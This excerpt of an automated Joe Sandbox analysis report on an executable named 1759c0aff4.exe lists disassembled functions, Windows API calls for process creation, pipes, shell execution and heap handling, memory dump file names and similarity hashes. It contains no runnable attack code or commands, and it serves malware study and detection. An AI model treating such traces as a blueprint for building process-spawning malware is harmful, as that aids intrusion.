PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02498BC8,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD

Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0

Strings

$pA, xrefs: 00403078

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
String ID: $pA
API String ID: 790731606-4007739358
Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E

Function 0040249D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
PathRemoveArgsW.SHLWAPI(?), ref: 00402585

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(02499760,02499760,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040E5F0: HeapFree.KERNEL32(02490000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608

Strings

*pA, xrefs: 004025AB

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: *pA
API String ID: 1199808876-3833533140
Opcode ID: 978365ab2a22ce9fb3928a5ef7e0fcf4419ed98c8898819fe6a111c9215247d9
Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
Opcode Fuzzy Hash: 978365ab2a22ce9fb3928a5ef7e0fcf4419ed98c8898819fe6a111c9215247d9
Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E

Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754

Strings

, xrefs: 0040976E
", xrefs: 00409776

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369

Function 0040A638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040A66D
wcscmp.MSVCRT ref: 0040A6A6

Strings

$0A, xrefs: 0040A644

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: _wcsicmpwcscmp
String ID: $0A
API String ID: 3419221977-513306843
Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA

Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746

Strings

$0A, xrefs: 0040570B

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: $0A
API String ID: 626452242-513306843
Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD

Function 0040DBFF Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94

Function 0040E7D0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040E7E5
HeapAlloc.KERNEL32(02490000,00000000,0000000A), ref: 0040E809
HeapReAlloc.KERNEL32(02490000,00000000,00000000,0000000A), ref: 0040E82D
HeapFree.KERNEL32(02490000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98

Function 0040DB18 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E

Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65

Function 0040DD5D Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8

Function 0040A54F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802

Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8

Analysis Process: 1759c0aff4.exePID: 8088, Parent PID: 8028COMMON

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	34

Executed Functions

Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395
memorypipesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00409A69
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
wcslen.MSVCRT ref: 00409C2A
wcslen.MSVCRT ref: 00409C38
HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
wcscpy.MSVCRT ref: 00409C6A
wcscat.MSVCRT ref: 00409C71
wcscat.MSVCRT ref: 00409C7C
wcscpy.MSVCRT ref: 00409C88
wcscat.MSVCRT ref: 00409CA3
wcscat.MSVCRT ref: 00409CB0
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
wcslen.MSVCRT ref: 00409E04
wcscpy.MSVCRT ref: 00409E2A
memset.MSVCRT ref: 00409E56
ShellExecuteExW.SHELL32 ref: 00409EB3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB

Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

HeapFree.KERNEL32(00000000,?), ref: 00409F37

Strings

x, xrefs: 00409DEC
$0A, xrefs: 00409C0E

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
String ID: $0A$x
API String ID: 550696126-3693508903
Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A

Function 00401000 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 108
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691

Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D

Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502

Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB

Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0

Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1

SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03

ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011B6
HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB

Strings

|pA, xrefs: 00401044
